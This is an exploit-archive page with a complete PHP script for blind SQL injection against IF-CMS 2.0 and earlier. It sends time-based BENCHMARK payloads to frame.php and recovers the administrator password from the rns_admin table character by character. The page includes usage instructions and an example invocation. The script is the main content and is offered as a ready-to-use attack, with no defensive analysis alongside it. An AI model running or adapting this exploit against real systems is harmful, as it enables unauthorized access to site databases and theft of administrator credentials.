what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

IF-CMS 2.0 Blind SQL Injection

IF-CMS 2.0 Blind SQL Injection
Posted Feb 9, 2009
Authored by darkjoker | Site darkjokerside.altervista.org

IF-CMS versions 2.0 and below remote blind SQL injection exploit that leverages frame.php.

tags | exploit, remote, php, sql injection
SHA-256 | 495902f6a4d4fa1816cfba9536809df78c18965cb272a62be4c63568e1a3fe2e
Download | Favorite | View

IF-CMS 2.0 Blind SQL Injection

Change Mirror Download
--+++=======================================================+++--
--+++====== IF-CMS <= 2.0 Blind SQL Injection Exploit ======+++--
--+++=======================================================+++--

<?php

function query ($username, $char, $pos)
{
  //Increase benchmark when exploit prints uncorrect passwords

  $query = "x' OR IF ((ASCII(SUBSTRING((SELECT pass FROM rns_admin WHERE ".
     "nick = '{$username}'),{$pos},1))={$char}), BENCHMARK(100000000,CHAR(0)),0) OR '1' = '2";
  $query = str_replace (" ", "%20", $query);
  $query = str_replace ("'", "%27", $query);
  return $query;
}

function exploit ($hostname, $path, $username, $char, $pos)
{
  $char = ord ($char);
  $fp = fsockopen ($hostname, 80);
  $get =  "GET {$path}/frame.php?id=". query ($username, $char, $pos) . " HTTP/1.1\r\n".
    "Host: {$hostname}\r\n".
    "Connection: Close\r\n\r\n";
    $a = time ();
  fputs ($fp, $get);
  while (!feof ($fp))
    fgets ($fp, 1024);

  fclose ($fp);
  $a = time () - $a;
  if ($a > 4)
    return true;
  else
    return false;

}

function usage ()
{
  echo "\nIF-CMS <= 2.0 Blind SQL Injection Exploit".
       "\n[+] Author  : darkjoker".
       "\n[+] Site    : http://darkjoker.net23.net".
       "\n[+] Download: http://downloads.sourceforge.net/if-cms/If-CMS-2.07.zip?modtime=1088812800&big_mirror=0".
       "\n[+] Usage   : php xpl.php <hostname> <path> <username>".
       "\n[+] Ex.     : php xpl.php localhost /IF-CMS root".
       "\n\n";
  exit ();
}

if ($argc != 4)
  usage ();
$hostname = $argv [1];
$path = $argv [2];
$user = $argv [3];
//Edit this keylist when returned password is incomplete and add other characters you want
$key = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
$chr = 0;
$pos = 1;
echo "[+] Password: ";
while ($chr < strlen ($key))
{
  if (exploit ($hostname, $path, $user, $key [$chr], $pos))
  {
    echo $key [$chr];
    $chr = 0;
    $pos++;
  }
  else
    $chr++;
}
echo "\n\n";
?>

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close